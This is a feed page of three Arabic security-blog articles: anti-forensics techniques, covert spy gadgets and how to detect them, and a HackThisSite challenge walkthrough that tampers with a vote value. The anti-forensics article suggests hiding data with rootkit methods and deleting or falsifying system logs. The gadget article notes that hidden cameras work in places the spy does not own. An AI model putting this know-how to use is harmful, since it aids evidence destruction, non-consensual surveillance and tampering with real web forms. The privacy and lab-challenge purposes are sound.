Quantcast
Channel: iSecur1ty
Viewing all 466 articles
Browse latest View live

مقال : تقنيات الحماية ضد عمليات التحقيق الجنائي الرقمي

$
0
0

بسم الله الرحمن الرحيم

digital

عملية التحقيق الجنائي الرقمي هي عملية التحري و البحث عن أي معلومات يحتويها الحاسوب والتي تسمى في مجال التحقيق الجنائي الرقمي ( الأدلة) لتقديمها للمحكمة او الجهة المختصة .  المجال بشكل عام هو مجال قانوني يبحث عن اي ادلة تقدم للمحكمة لأثبات جريمة او نفيها بغض النظر عن نوع الجريمة , التحقيق الجنائي الرقمي يخص جميع القضايا ليس القضايا المتعلقة بجرائم الحاسوب فقط  وهذا ما يظنه الكثيرين ان التحقيق الجنائي الرقمي متخصصة في التحقيق على جرائم الحاسوب فقط وهذا غير دقيق قسم التحقيق الجنائي الرقمي عباره عن معمل خاص بالأجهزة الإلكترونية خاصة الحواسيب والهواتف بشكل كبير ليتم تحليل هذة الأجهزة للجهات الأمنية بغض النظر عن نوع القضية  .

متى يمكن ان يكون حاسوبي عرضة لعملية التحقيق الجنائي الرقمي .

ليس هناك حالة معينة يمكن ان تكون فيها عرضة لعملية التحقيق الجنائي ومصادرة اجهزتك مثل الابتوب او الهاتف. في اي لحظه من الممكن سحب اجهزة وتحليلها من قبل المختصين في المطار على سبيل المثال او اثناء تعرضك لأي اتهام بقضية او اشتباه في اي قضية لذلك اذا كنت من الاشخاص الذين يملكون معلومات مهمة في حاسوبك الشخصي او هاتفك الذكي يجب عليك تعلم طرق التشفير والحماية وزيادة الخصوصية على هذة الاجهزة لكي تضمن ان تبقى معلوماتك في مكان أمن بقدر المستطاع حتى وان كانت اجهزتك في ايدي خبراء التحقيق الجنائي الرقمي .

كيف يمكنني حماية اجهزتي من التحقيق الجنائي الرقمي :

عملية التحقيق الجنائي الرقمي هي عملية قانونية ولا يحق لأي جهة اخذ أجهزتك الا بأذن محكمة ولكن في الحقيقة سوف يتم سحبهم في اي لحظه من اي شخص له السلطة سواء كنت في مطار او قسم شرطة او اي مكان له سلطة قضائية وبدون أذنك

ولكن الخوف ليس اخذ اجهزة الحاسب او الهاتف بشكل قانوني وانا اعرف ذلك وبموافقتي, المشكلة ان الكثيرين من الناس يتعرضون لتحليل اجهزتهم واخذ البيانات بشكل سريع واحيانا زرع ملفات تجسس  وبدون معرفتهم اثناء مرورك في المطار او دخولك قسم شرطة  على سبيل المثال سوف يتم طلب كل اغراضك وادخالها في المعمل بدون معرفتك وفي خلال فتره قصيرة سوف يتم زرع ملف تجسس او تعرض الجهاز للتحليل واخذ صورة كاملة من القرص . خاصة مع تطور اجهزة التحقيق الجنائي الرقمي والتي تقوم بالعملية بشكل سريع وتلقائي واغلبها تكون على هيئة حقيبة تحمل بداخلها حاسوب مع ملحقات اجراء اي عملية تحقيق جنائي رقمي .

 

الحل :

بما للجهات الحكومية ومتخصصين التحقيق الجنائي الحق في استخدام العلم وتطوير اساليبهم في التحقيق والتحليل للبيانات واستخراجها , ايضا انت لديك الحق في استخدام اساليب وتقنيات حماية معلوماتك وخصوصيتك بتقنيات حماية تجعل من عملية استخراج البيانات وتحليلها صعبة جدا ان لم تكن مستحيلة . ولا يوجد قانون على الكرة الارضية يلزم اي مواطن بأعطاء كلمة السر للبيانات التي يملك وأنما على المتخصصين محاولة فك التشفير ان أستطاعوا وليس الزام الشخص نفسة اعطاء كلمة السر الخاصة به . لذلك يجب على كل انسان ان يتعلم حماية نفسة ومعلوماتة وفهم التقنية لحماية ما يملك .

تقنيات الحماية ضد عملية التحقيق الجنائي الرقمي :

عملية التحقيق الجنائي الرقمي بشكل عام تسير بأربع خطوات رئيسية وهي :

  • Identification
  • Acquisition
  • Analysis
  • Reporting

وهذة الخطوات بشكل مختصر تعني تحديد الهدف او نوع المعلومات المراد الحصول عليها ثم الحصول على نسخة من المعلومات او مصدر لهذة المعلومات ثم تحليل هذة المعلومات حتى الوصول للمطلوب ثم كتابة التقرير للعملية. لذلك  يجب علينا اخذ الاحتياطات اللازمة لحماية المعلومات مثل التشفير بسبب انها اقوى طريقة لحماية البيانات من اي عملية تحقيق جنائي رقمي  وهي الطريقة الشائعة من الكثيرين لحماية البيانات  , ولكن عملية التحقيق الجنائي الرقمي لا تهتم بالبيانات فقط وأنما تهتم بكل شئ وبكل معلومة يمكن استخراجها مثل تاريخ التصفح , اوقات تشغيل وايقاف الجهاز , البرمجيات المنصبة وملفاتها , سجلات النظام , الملفات المحذوفة واسترجاعها , كلمات السر المحفوظة ,المستندات والبيانات  والكثير من المعلومات التي يمكن استخراجها . التشفير وحدة لا يمكننا من حماية كل شئ لذلك يجب تطبيق امور اخرى لزيادة مستوى الحماية  . سوف نستعرض بعض النقاط التي يمكن ان تصعب العملية بشكل كبير جدا ويمكنك استخدامها على جهازك .

 

  • اخفاء الملفات :

Steganography

في هذة الحالة اذا نجحنا في أخفاء البيانات فأن عملية التحقيق الجنائي الرقمي لن تتقدم من الخطوة الاولى وهي تحديد نوع البيانات المطلوبة او يمكننا القول تحديد الهدف , فكيف سوف يتم الانتقال الى المرحلة الثانية  ولم يكن هناك اي مكتشفة بعد  . هناك بعض الأدوات المفيدة في اخفاء البيانات مثل :

اداة bmap :

تمكنا الاداة من اخفاء بيانات داخل بيانات اخرى مستخدمة Slack Space المتواجدة في القرص الصلب, وهذه المساحة تتكون من أجزاء صغيرة من مساحات فارغة متكونة بسبب الملفات المتخزنة بداخل  Blocks الخاصة بالهارديسك .

 

اداة Steghide :

اداة رائعة تمكنا من اخفاء البيانات داخل الصور او ملفات الصوت ,مثل :  JPEG, BMP, WAV , AU . ولن تتاثر الملفات ابدا وسوف تظهر بدون ادنى شك , فعلى سبيل المثال اذا اخترت صورة معينة وقمت باستخدامها وحفظ بداخلها معلومات مستند txt مهم سوف تظهر الصورة كما هي ولن يظهر اي تغيير ولن يستطيع اي شخص التمييز او الملاحظة .

ايضا هناك الكثير من الادوات التي تقوم باخفاء البيانات مثل OutGuess, appendX,Sekritz,Shadow-JPEG,PGE . تستطيع تجربتها لأخفاء البيانات .

 

  • Rootkits :

عادة يتم استخدام Rootkits لأخفاء الملفات والملفات الضاره في نظام التشغيل , وتستخدم Rootkits العمليات الاخرى في النظام او ملفات اخرى في النظام كنقاع لها للتخفي عن برامج المراقبة والحماية , ويمكن ايضا استخدام Rootkits في اخفاء الملفات الخاصة بنا ليس من الضروري ان تكون ملفات ضارة وانما نستخدم نفس طرق التخفي التي تستخدمها Rootkits لأخفاء الملفات من اعين المحقق الجنائي , وهذة الطرق تعتبر من اكثر الطرق احترافية في اخفاء الملفات ولكنها تحتاج لخبرة نوعا ما جيدة لكي يستطيع الشخص اخفاء الملفات بشكل احترافي مثل حقن ملفات dll , او تغيير مفاتيح الرجستري وتزوير اسماء المستخدمين والكثير من الامور الممكنة . على سبيل المثال يمكن تعديل بعض من مفاتيح الرجستري وتزوير عملية في النظام لتظهر باسم اخر اي ان البرنامج يحمل اسم ويظهر في ادارة المهام مثلا بأسم اخر , بالطبع هذا امر سهل ولكني اريد توصيل الفكرة لا غير , يوجد هناك طرق معقدة يمكن تنفيذها بواسطة الهندسة العكسية وعملية جدا .

 

 

030713_1504_AntiForensi7

030713_1504_AntiForensi6

 

  • اخفاء الملفات في مساحات الهارديسك الغير متوقعة :

يمكن اخفاء الملفات الحساسة في مناطق في الهارديسك والغير متوقعة مثل مساحة MBR  وهي مساحة يحجزها الهارديسك  (Master Boot Record) ليستخدمها في عملية الاقلاع او وضع معلومات sectors للاقراص , بالرغم ان هذة المساحة لن تكون كبيرة الا انها مساعدة لوضع ملفات بداخلها . HPA Area  ايضا احد المساحات الاخرى الغير متوقعة وغير مكشوفة للمحقق الجنائي الرقمي والتي تخص (Host Protected Area)  هذه المساحة مخفية ولا يمكن الدخول اليها من نظام التشغيل او استعراضها وفي الغالب تستخدم لعمليات الاستعادة لنظام التشغيل وعادة ما تكون هي اول مساحة من الهارديسك . DCO Area مساحة اخرى موجودة في الهارديسك (Device Configuration Overlay) بمكن استخدامها ايضا ,   وغالبا هذة الطرق جميعها التي تستخدم مناطق غير متوقعة في القرص الصلب ليست قوية ومن الممكن كشفها بسهولة من المحقق بحسب الخبرة التي يملكها  وتختلف من شخص الى اخر .

 

جميع طرق اخفاء الملفات لا تجعل الملفات محمية ولكن الهدف الرئيسي هو جعل عملية التحقيق الجنائي اكثر صعوبة , يمكن للمحقق الجنائي العثور على الملفات ولكن من الرائع لو استخدمنا طرق اخفاء الملفات مع التشفير فيتم اخفاء ملفات مشفرة فأذا خسرنا الحاجز الاول وهو الاخفاء لا زال لدينا الحاجز الثاني والاكثر قوة وهو التشفير .

 

  • تشفير البيانات  (Cryptography)  :

 

Cryptographic

التشفير او ما يسمى احيانا التعمية هي من اقوى الطرق لحماية البيانات ووضعها في حالها غير قابلة للقراءة والفهم عن طريق استخدام خوارزميات رياضية تجعل هذة البيانات لا فائدة لها بدون مفتاح التشفير والذي بواسطة سوف يتم فك الخوارزمية لفهم البيانات , وفي الغالب المفتاح يكون عبارة عن كلمة مرور نصية تتكون من مجموعة من المحارف ويمكن ايضا ان تكون كلمة المرور عبارة عن ملف او جهاز USB ولكن الغالب والشائع هو كلمة مرور . اساليب التشفير يمكن استخدامها بواسطة برمجيات تقدم هذة الخدمة او بواسطة نظام التشغيل نفسة , حاليا جميع انظمة التشغيل مثل وندوز وماك ولينكس واندرويد وغيرها من انظمة التشغيل تقدم ميزة التشفير للبيانات بشكل افتراضي في الاجهزة وايضا يمكن للجهزة ان تقوم بعملية “self-destruct” وهي عملية التدمير الذاتي للبيانات في حالة كان هناك محاولة لتخطي او كسر التشفير .

اشهر برامج التشفير “TrueCrypt” يعمل على جميع انظمة التشغيل ويمكن استخدامة لحماية البيانات ويجب استخدام خوارزميات مثل AES256 وهي اقوى خوارزميات الشفير على الاطلاق كذلك يجب انشاء مفتاح تشفير طويل جدا للحماية من هجمات التخمين :

truecrypt

البرنامج سهل جدا في استخدامة ويمكن بواسطة تشفير القرص بشكل كامل او القيام بتخصيص مساحة مشفرة خاصة بنا , ويحتوي البرنامج على العديد من الخصائص والمميزات الرائعة .

 

  • المسح الآمن :

 

hard-disk-drive-delete-erase-safely

حذف البيانات بحيث لا يستطيع الطب الشرعي استعادتها مهم جدا , فعملية التحقيق الجنائي الرقمي شاملة كل شئ حتى تلك البيانات التي قمت بحذفها قبل سنوات طويلة يمكن استرجاعها وتحليلها , لذلك ألتأكد من حذف البيانات بشكل كلي امر مهم ويستاهل فيه الكثيرين , عملية المسح العادية التي تقوم بها على جهازك عن طريق اختيار الملف ومسحه لا تقوم بمسح الملف بشكل نهائي ويمكن استعادته بكل سهولة لذلك بياناتك الحالية والبيانات السابقة في خطر .

اداة Wipe :

اداه تقوم بعملية مسح البيانات بشكل امن , ويمكن للأداة ان تقوم بكتابة ارقام عشوائية على مكان الملف المحذوف في القرص 34 مرة ليتم حذف الملف بشكل كلي وتام , ويمكن استخدام الاداة لمسح ملف واحد او مجلد او القرص بالكامل ولكن الاداة سوف تاخذ الكثير من الوقت حتى الانتهاء من مسح القرص بالكامل لذلك يمكنك استخدام اعادة كتابة ارقام عشوائية 4 او 5 مرات فقط .

اداة Shred :

اداة shred هي امر موجود بشكل افتراضي في العديد من توزيعات لينكس مثل اوبينتو ويمكن استخدام الامر لحذف الملفات والتاكد من عدم امكانية الاستعادة عن طريق كتابة اصفار مكان الملف في القرص عدة مرات .

 

ايضا هناك العديد من الادوات المساعدة لمسح البيانات بشكل كلي :

srm اداة تستخدم بديلا عن الامر rm في لينكس لمسح البيانات والملفات بشكل كلي

sdmem اداة تستخدم لمسح البيانات في ذاكرة النظام RAM

sfill اداة تستخدم لمسح المساحة الفارغة من القرص والتأكد من عدم احتواها على اي ملفات يمكن استرجاعها

sswap اداة تستخدم لمسح مساحة الابدال swap بشكل نهائي

مازال هناك الكثير من الأدوات المجانية والمدفوعة والتي تستخدم لمسح الملفات بشكل نهائي وهذة مجرد امثلة لتوضيح الفكرة فقط .

 

بعض من الشركات والمنظمات خاصة التي تملك بيانات حساسة تستخدم طرق اكثر تقدم لمسح البيانات بشكل نهائي عن طريق مغنطة الهارديسك بواسطة اداوات متخصصة في تكوين مجال مغناطيسي يقوم بمسح كل شئ على الاقراص الموجودة بداخل الهارديسك  وتدمير اي بيانات محتملة انها موجودة في الهارديسك , وعيب هذة الطريقة انها مكلفة ولا يمكن للشخص العادي تحمل تكلفتها .

    • حذف سجلا ت النظام:

 

logs file

 

ملفات التقارير المتكونة من نظام التشغيل او من اي برمجيات منصبة على النظام هدف كل محقق جنائي رقمي لدراستها وتحليلها للحصول على الكثير من المعلومات المهمة والمفيدة في التحقيق , والكثير من عمليات الاختراق تتم ثم يقوم المهاجم بمسح التقارير لكي لا يتم تتبعة او معرفة اي معلومات تخص الهجوم , ماذا اذا تم التلاعب بهذة التقارير سوف يحصل المحقق على معلومات خاطئة ولن يكون بمقدوره تحليل المعلومات والوصول الى اي شئ .

 

  • تدمير معلومات - Meta-Data  للملفات :

Meta-Data

بيانات Meta-Data  هي عبارة عن معلومات يتم تخزينها مع الملفات لتسهيل التعامل معها وجعلها اكثر وضوح مثل تاريخ الانشاء للملف او تاريخ اخر تعديل , حجم الملف , اسم البرنامج التي تم انشاء الملف بواسطتة , على سبيل المثال ملفات WORD التي يتم انشائها بواسطة مايكروسوفت ورد في نظام تشغيل وندوز تحتوي على معلومات Meta-Data كاصدار البرنامج واسم المستخدم الذي تم انشاء به المستند واصدار نظام التشغيل , ايضا مثال اخر الصور التي يتم التقاطها بواسطة الكاميرات الحديثة او الهواتف الذكية تحتوي على معلومات عن الصورة وعن الجهاز الملتقط بها كذلك احيانا تحتوي على معلومات المكان بواسطة GPS للمكان الملتقطة فيه . هذة البيانات الوصفية للملفات خطيرة جدا ويمكن للمحقق الجنائي الرقمي الحصول على الكثير من المعلومات بواسطتها لذلك يجب التركيز عليها والانتباه لها .

 

  • الاقلاع من انظمة تشغيل محمولة من اقراص قابلة للازالة :

usb-drive

احد الطرق المفيدة لحماية البيانات والخوف من مصادرة الحواسيب وتعرض اصحابها للمسائلة وهي ان يقوم الشخص بوضع نظام التشغيل على قرص USB لخطوة البيانات التي يعمل عليها بحيث ان كل شئ موجود بداخل قرص ال USB , ايضا يمكن استخدام اقراص DVD  لأستخدامها كنظم تشغيل محمولة LIVE غير قابلة للتعديل او الاختراق فعند الانتهاء من العمل يتم اطفاء الحاسوب ويعود كما كان لم يتم حفظ اي بيانات . ويمكن ايضا ان تكون الاقراص مشفرة بواسطة مفتاح تشفير موجود على قرص USB .

هذه كانت بعض النقاط التي يمكن الاستفادة منها لزيادة صعوبة عملية التحقيق الجنائي الرقمي , نراكم في مقالات اخرى ان شاء الله .

 


مقال : كيف تعمل اجهزة التجسس وطرق الكشف عنها

$
0
0

بسم الله الرحمن الرحيم

 

تطورت التكنولوجيا و تطورت معها جميع جوانب الحياه المختلفة  واصبح من السهل تنفيذ ما نرغب به بكل بساطة وتحويل الخيال الى حقيقة ملموسة في ارض الواقع , واختفت الكثير من الاساليب والادوات التي كانت تستخدم في الماضي للقيام بمهام  معينة  وحلت بدلا عنها اجهزة الكترونيه تقوم بعملها بدقة اكبر  . احد الامثلة التي سوف اتحدث عنها وهي اجهزة التجسس التي خلقت لنا عالم جديد واساليب جديده  للتجسس وايضا سوف نتحدث كيف يمكن كشفها بواسطة اجهزة كشف التجسس (Anti-Bugging) المستخدمة بشكل واسع من رجال الشرطة  والأمن وشركات الحماية للكشف عن اي أجهزة تجسس في مكان معين او للكشف عن اجهره تجسس يحملها الشخص في ثيابة او يرتديها .

ماهي اجهزة التجسس (Spy Gadgets) :

I spy logo one

تقدمت الاتصالات اللاسلكية بشكل كبير جدا في العشر السنوات الاخيرة كذلك صغرت حجم الاجهزة الإلكترونية حتى اصبحت مخفية عن اعين البشر ولا يمكن ملاحظتها بسهولة وهذه الثورة في الاتصالات وهندسة الالكترونيات  ساعدت كثيرا لصناعة اجهزة صغيرة لمهام الحياه المختلفة , اي شخص لدية فكره يريد تطبيقها ويملك القليل من الخبره في مجال برمجة الحاسب وهندسة الالكترونيات يمكن بناء فكرتة بسهولة وبدون اي تكاليف تذكر وهذا ينطبق تمام على  اجهزة التجسس التي كان لها نصيب كبير لتطبيقات هذة التكنولوجيا و التي تستخدم الاتصالات اللاسلكية لتسريب ما تقوم بتسجيله  مثل كاميرات التجسس واجهزة التنصت على الصوت او الموبايل واجهزة تتبع GPS  وغيرها من الاجهزة . اصبحت عملية التجسس على اي شخص ليست بتلك المهمة المعقدة  التي يعتقدها  البعض , في الحقيقة الامر ابسط بكثير ومن الممكن ان تتم عمليات تجسس من اشخاص لا يملكون ادنى فكره عن كيفية عمل الاجهزة  وهذة مشكلة كبيره ان تصبح اجهزة التجسس في متناول الجميع ويمكن شراؤها ببضعة دولارات فقط  . ايضا يمكن ان يتجسس عليك اي شخص صديق او قريب بوضع جهاز تنصت للصوت او كاميرا تجسس او متتبع GPS بكل سهولة ويراقبك .

انواع اجهزة التجسس كثيرة جدا ولها استخدامات مختلفة ولكن بشكل  رئيسي تنقسم الى :

  • اجهزة التنصت على الصوت .
  • اجهزة التجسس على الهاتف وتسجيل المكالمات
  • كاميرات التجسس
  • اجهزة تتبع GPS

وسعر هذة الاجهزة  ليس بالمكلف والكثير منها لا يتجاوز دولارات قليلة وهناك اجهزة تحمل خصائص رائعة ومرونة عالية جدا كما سوف نستعرض البعض , على سبيل المثال : يمكن وضع جهاز تنصت داخل الجدار يمكنة تسجيل اي صوت داخل الغرفة لأيام  . تستخدم اجهزة التجسس تقنيات مختلفة ومعقدة فهناك اجهزة تستخدم WIFI لنقل البيانات وهناك اجهزة تستخدم GSM NETWROK  وهناك اجهزة تستخدم UHF المستخدمة للاتصالات بعيدة المدى مثل الاتصالات العسكرية والاقمار الصناعية .

هناك اجهزة تجسس يمكنها تسجيل الصوت داخل الجدار بعمق 15cm وهذا كافي جدا لأخفائها بداخل الجدار ولا يمكن لأي شخص اكتشافها بشكل عادي بدون استخدام اي أجهزة كشف الذبذبات

 

امثلة على اجهزة تجسس :

 

wifi_ac_adapter_hidden_camera__13389.1405436906.398.398

wifi_ac_adapter_hidden_camera_back__28519.1405434000.398.398

الجهاز السابق كما تلاحظون عبارة عن باور كهرباء عادي جدا , ولكنة في الحقيقة كاميرا تجسس مخفية وتعمل عن طريق WIFI وتقوم بتسجيل حي للمكان المتواجدة به وتقوم ببث هذا التسجيل عن طريق شبكة wifi الى الروتر المتصل بها ويمكن ادارتها والتحكم بها عن بعد عن طريق الروتر او اي جهاز متصل بنفس الشبكة او يمكن التحكم بها ومتابعتها عن بعد بواسطة الأنترنت الصورة التالية توضح كيفية ادارة الجهاز ومتابعتة

internet_router_wifi_spy_camera_diagram__99970.1406231551.1280.1280

( هل كنت تتوقع وجود كاميرات تجسس بهذا الشكل )

هناك بعض العيوب في الجهاز السابق وهي انه مكشوف جدا وغير عملي كذلك التنصت بشبكة WIFI غير مرن واحتاج الى روتر والى معدات اخرى ربما المكان الذي اريد التجسس عليه ليس ملك لي . في هذة الحالة نحن نحتاج جهاز تجسس مخفي تماما والكاميرا تكون مخفية بشكل كامل حتى وان قام الشخص بحمل الجهاز بيدة كصدفة لا يمكن ان يعرف ذلك .

3g_wallclock_merge

 

ساعة حائط تعمل ككاميرا تجسس ولكنها اكثر تقدماً من الجهاز السابق , الكاميرا مخفية تماما ولا يمكن ملاحظتها ابدا كذلك تعمل بواسطة 3G وليس WIFI الان تستطيع استخدام الكاميرا في اي مكان ليس ملك لك ولن يستطيع صاحب المكان معرفة ان هذه الساعة  تجسسيه .

مميزات الكاميرا :

  • تسجيل صوت وصورة .
  • تحتوي على lithium battery قوية تمكنها من العمل لساعات طويلة ان لم تكن ايام .
  • يمكن الاتصال بالساعة بمكالمة هاتفية للاستماع الى الاصوات .
  • يمكن ارسال رسائل sms كأوامر بتفعيل التسجيل او ايقافة كذلك الى التقاط صورة وارسالها وغيرها من الاوامر .
  • التسجيل بشكل مباشر الى الى ذاكرة تخزين SD . يمكن وضع ذاكرة بحجم 32 جيجا بايت
  • بث تسجيل مباشر والاستقبال بواسطة هاتف android ومتابعة ما يجري

هناك الكثير والكثير من الاجهزة بانواعها ومميزاتها المختلفة سوف اريكم ايضا مثال لاجهزة التجسس المحمولة التي يمكن ارتداها والتنقل بها لتسجيل مايجري , هناك العديد من الاجهزة  المحمولة بمختلف اشكالها وانواعها . يوجد اجهزة على شكل قلم او ساعة يد او ميدالية لمفتاح سيارة شبية بجهاز الرموت للسيارات وغيرها . سوف نستعرض هذة النظاره  (LawMate™ CM-SG20) التي تحتوي على كاميرا مخفية بداخلها .

lawmate_clear_glasses_hidden_camera__70778.1405437005.398.398

رائعة بالفعل يمكن ان تشتريها ببساطة من موقع Amazon او Ebay تعرف عليها بشكل افضل من ملف Datasheet للنظاره .

ايضا ضمن اجهزة التجسس واهمها هي اجهزة تتبع GPS وتاتي على اشكال عديدة على حسب المهمة المطلوبة ومنها ما يستخدم بشكل مقصود في السيارات المهمة للوفود والسفارات وبعض المركبات المهمة مثل السيارات التي تنقل الاموال من بنك الى اخر  لمتابعة خط سيرها بشكل دقيق ومنها ما يستخدم للتجسس احد الامثلة جهاز BlackOps™ OBD GPS Tracker  

31P8QT1ODZL

تستطيع استخدامه للاغراض الامنية  الامنية والتجسس بسبب صغر حجمة  يمكن اخفاءة بسهولة وبطاريتة تعمل لوقت طويل ويخزن الجهاز الاماكن كل فتره  زمنية معينة او ارسال تقارير بشكل دوري  .

وهناك اجهزة اكثر احترافية مثل هذا الجهاز الرائع المخفي داخل علبة ادوية لن يشك فيها احد اطلاقاً

gps_tracker_pill_bottle_bait_bottle__31316.1405432509.1280.1280

يمكن تتبع اي مركبة بواسطة الجهاز ومتابعه تحركات الجسم من اي جهاز كمبيوتر او هاتف ذكي بسهولة , الجهاز يمكن ان يعمل لمدة اسبوع كامل بدون ان تنفذ البطارية . يقوم الجهاز باعطاء تقرير بمكان الجسم كل فتره زمنية من خلال Email او SMS ايضا يمكن متابعة تحرك الجسم متابعة حية على الخريطة .

 

كيف تعمل اجهزة التجسس في ابسط حالاتها :

اجهزة التجسس بمختلف انواعها سواء كانت كاميرات او اجهزة تنصت او متتبعات GPS كلها تعمل بواسطة موجات الراديو لنقل البيانات الى الطرف الاخر وهذا النوع من اجهزة التجسس يمكن رصدة والحماية منه بواسطة حجب جميع الاتصالات في المكان الهدف ولن تعمل هذه الاجهزة بسبب انها غير قادرة بالاتصال بالعالم الخارجي  , ايضا هناك اجهزة تجسس اخرى تعمل بشكل يدوي لا تستخدم الاتصالات خارجية فقط تقوم بالتجسس وتسجيل البيانات في قرص داخلي مثل ذاكرة SD  ويقوم الشخص المتجسس بشكل يدوي اخذ هذا الجهاز بعد عملية التجسس وأخراج الذاكرة ووصلها بالحاسوب لسحب البيانات انا احب دائما اطلق عليها اجهزة التجسس الصامتة  وهذا النوع من الاجهزة يعتبر خطيرة بسبب ان اكتشافها يصبح أصعب ولا يمكن اكتشاف مكانة بواسطة اجهزة كشف الذبذبات  وعيبها يجب ان يكون للمتجسس وصول فيزيائي بالمكان ويستطيع الدخول والخروج منه , ايضا ليس من الصعب ان يتم تصميم جهاز يقوم بالتجسس دون بث اي اتصالات خارجية لحماية الجهاز من الاكتشاف بواسطة اجهزة الكشف عن الذبذبات او حجب الاتصالات  بواسطة اجهزة الحجب ,  ويتم التجسس وتخزين المعلومات الى ذاكرة تخزين وفي وقت معين يقوم المتجسس ببرمجته لتعمل الاتصالات لنقل البيانات ثم ايقاف الاتصالات او الذبذبات مره اخرى وتعمل من جديد بشكل صامت .

 

الحماية من أجهزة التجسس :

الحماية من اجهزة التنصت ليس بالامر السهل الذي قد تتوقعه يجب ان تكون مدرب ومؤهل للبحث عن اجهزة التجسس . هناك اجهزة تجسس متقدمة جدا  تعمل في حالات وتقوم باطفاء نفسها في حالات اخرى ويصعب اكتشافها ببساطة ويمكن حماية الاماكن من اجهزة التجسس بطريقتين .  الطريقة الاولى / عن طريق حجب وتشويش كل الاتصالات بكافة انواعها في منطقة معينة لمنع اي اتصالات داخله او خارجه من اي اجهزة وقد كنا تحدثنا عن اجهزة التشويش للشبكات سابقا في مقال : كيف تعمل اجهزة التشويش , الطريقة الثانية :  وهي بواسطة استخدام اجهزة كشف الذبذبات للبحث في ارجاء الغرفة او المكان الهدف عن اي اجهزة تجسس والعثور عليها . ولحماية قوية يتم جمع بين التشويش للاتصالات والحماية الفيزيائية  للمكان لضمان عدم وجود أجهزة يدوية تعمل بدون اتصالات خارجية كما وضحت في الأعلى .

 

اجهزة كشف الذبذبات ( Anti-Bugging ) :

اجهزة كشف التجسس : هي اجهزة تستخدم للبحث عن اي ذبذبات تمر في الهواء ضمن دائرة معينة للتاكد من خلو المكان من اي اجهزة الكترونية تستخدم الاتصالات اللاسلكية (Radio Frequency) . وتتفاوت قوة هذه الأجهزة بحسب إمكانياتها على الكشف والمميزات والتي تحتويها سوف نستعرض هذا لاحقا . تستخدم اجهزة كشف الذبذبات أيضا اثناء عمليات التفتيش للاشخاص والمركبات في البوابات والاماكن المهمة  ويتم تمرير الجهاز على جسم الشخص صعودا ونزولا للتاكد من عدم ظهور اي ذبذبات صادرة من جسم الشخص او من جهاز يرتدية  .

يفضل اثناء قيامك بعملية بحث عن اجهزة تجسس ان تقوم باطفاء جميع الاجهزة الالكترونية من حولك لضمان عملية بحث دقيقة ومتابعة حساس الجهاز بشكل سليم وعدم حدوث اي تداخلات في الذبذبات .

هناك كورس يتم اعطائه لحرس البوابات وللأشخاص الذين يقومون بعملية البحث عن أجهزة التجسس مدته 8 ساعات , لذلك قد تصبح العملية بالنسبة لك اذا اشتريت احد كاشف الذبذبات صعبه في البداية ولكن مع التدرب والمحاولة سوف يصبح الامر سهل بالنسبة لك .

عادة كانت اجهزة التجسس تستخدم الترددات ما بين 2GHz الى 3Ghz , ولكن حاليا اصبح هناك اجهزة اقل واعلى من هذا النطاق مثل 5GHz وكانت ايضا اجهزة الكشف القديمة تكشف نفس النطاق السابق ولكن حاليا الاجهزة الحديثة لكشف الذيذبات اصبحت تكتشف تقريبا جميع الترددات .

سوف نستعرض فيديو عباره عن مراجعة لأحدة اجهزة كشف الذبذبات (TG-007A)

 

 

 

f931

الجهاز يمكن كشف الذبذبات ما بين 20-6000MHz  ويمكن خفض ورفع قوة الباور لحساسية الالتقاط لتكبير دائرة الالتقاط او تصغيرها على سبيل المثال اثناء التفتيش الجسدي للاشخاص يفضل تصغير الدائرة الى عشر او عشرين سم وعند استخدامه للتفتيش للمركبات يمكن رفعة الى نصف متر والتلاعب على حسب الوظيفة التي تقوم بها , يصدر الجهاز  صوت  رنين خفيفه اثناء التقاط اي ذبذبات كذلك يمكن الاعتماد ايضا على الشاشة لمعرفة مستوى الالتقاط اثناء التفتيش الجسدي او المادي .

ملاحظة :

تقنيا اجهزة كشف الذبذبات سوف تقوم بكشف اي اجهزة تجسس من حولك عن طريق كشف الذبذبات الصادرة منها حتى يتم العثور عليها وتدميرها وهذه خطوة من اهم الخطوات التي تنفذ لتامين منزل او مكان معين , ليس بالضروره ان عدم وجود ذبذبات ولم تستطيع العثور على اجهزة ان المكان امن فالتجسس وتقنياته واساليبه كثيرة ومتعددة جدا .

الى هنا انتهي من استعراض بعض الاجهزة وان شاء الله نلتقي في مقالات اخر , تحياتي .

مقال : حل التحدي الأول من تحديات موقع hackthissite – realistic

$
0
0

المرحلة: Realistic::1 (Uncle Arnold’s Local Band Review)

الصعوبة: سهلة

رابط التحدي: https://www.hackthissite.org/playlevel/1/

المهمة: صديقك سيخسر مئات من الأموال بالغش، حاول أن تساعده لكي لا يحدث هذا.

الرسالة: أهلا، أحتاج إلى مساعدتك! هل تذكر ذلك الموقع الذي تحدثنا عنه منذ فترة؟  Uncle Arnold’s Band Review Pa ؟ تراهنت أنا وصديقي أن فرقتي الموسيقية ستكون الأولى في نهاية هذا العام. المشكلة كما تعلم أن اثنان من أعضاء الفرقة ماتوا في حادث سيارة. ولكن الأحمق الذي تراهنت معه لا يزال مصرًا على إمضاء الرهان!
أعلم أنك جيد في الحاسب الآلي، فهل لك أن تساعدني؟ هل من الممكن أن تفعل أي شئ لتكون فرقتي على قمة الموقع؟ اسم فرقتي هي Raging Inferno وهي الأخيرة الآن.
أشكرك.

 

اذهب الآن وحاول أن تحل المشكلة. لا تتعدى هذه النقطة إذا كنت تريد حل التحدي بنفسك..

 


 

التلميح الأول:

فكر، مالذي قد يُؤثر على الترتيب! إما عدد المصوتين أو قيمة التصويت..

 

التلميح الثاني:

لن تستطيع التصويت لعدة مرات، لإن الموقع يقوم بإرسال PHPSESSID مع كل تصويت تقوم به! إذا لماذا لا تقوم بتغيير قيمة التصويت ليكون عددا كبيرا بدلا من الـ 5 مثلا!

 

الحل:

لنبدأ أولا بالتفكير بشكل منطقي، شيئان قد يؤثران على تصويت كهذا، إما عدد المصوتين أو قيمة التصويت. بالضغط بالزر الأيمن على أيقونة التصويت للفرقة الخاصة بصديقك، ومن ثم الضغط على “Inspect Element” سيظهر لك هذا :

ScreenClip

كما تلاحظ، يتم إرسال PHPSESSID مع كل محاولة تصويت، وهذا يمنعك من التصويت لعدة مرات لإنها ستُحتسب كمرة واحدة فقط. إذن لنحاول تغيير قيمة التصويت بدلا من 5، لتكن 1000000000000 مثلا ونجرب. غير القيمة لتكون كما في الصورة.

ScreenClip

ثم أضغط على “vote”. لقد تم حل التحدي.

*لا تنسى تغيير العدد الذي تختار من 1 إلى 5 (وهو الذي أجريت عليه التعديل) قبل الضغط أيقونة التصويت.

 

ملحق:

ما هو الـ PHPSESSID؟

